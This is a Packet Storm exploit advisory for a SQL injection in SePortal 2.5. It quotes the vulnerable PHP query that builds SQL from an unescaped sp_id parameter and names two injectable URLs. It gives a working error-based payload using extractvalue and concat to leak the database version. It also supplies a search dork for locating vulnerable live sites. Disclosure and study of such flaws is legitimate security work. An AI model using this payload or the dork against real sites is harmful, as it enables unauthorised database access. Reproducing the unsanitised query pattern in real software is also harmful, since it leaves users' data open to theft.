SePortal 2.5 SQL Injection

2014-03-19T00:00:00
ID PACKETSTORM:125785
Type packetstorm
Reporter jsass
Modified 2014-03-19T00:00:00

Description

                                        
                                            `####################################################################  
Exploit: SePortal 2.5 Sql Injection Vulnerabilty  
Author: jsass  
Date : 19\03\2014  
Contact Twitter: @Kwsecurity  
Script: http://www.seportal.org/  
version: 2.5  
Tested on: Linux Ubuntu 12.4 & Windows 7  
Dork : "Powered by SePortal 2.5"  
  
//** Searching And Analysis By Kuwaity Crew **\\  
  
####################################################################  
SQL INJECTION Vulnerabilty  
  
code :  
$main_template = 'staticpages';  
  
define('GET_CACHES', 1);  
define('ROOT_PATH', './');  
define('GET_USER_ONLINE', 1);  
define('GET_STATS_BOX', 1);  
include(ROOT_PATH.'global.php');  
require(ROOT_PATH.'includes/sessions.php');  
  
$sql = "SELECT *  
FROM ".STATICPAGE_TABLE."  
WHERE sp_id = '".$sp_id."'";  
$result = $site_db->query($sql);  
  
files:  
staticpages.php?sp_id=(inject here)  
print.php?mode=staticpage&client=printer&sp_id=(inject here)  
  
example:  
  
http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-  
  
//////////////////////////////////////////////////////////////////////////////////  
  
  
  
  
Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & الشبح الدموي & medo medo & sec4ever.com & is-sec.com  
  
`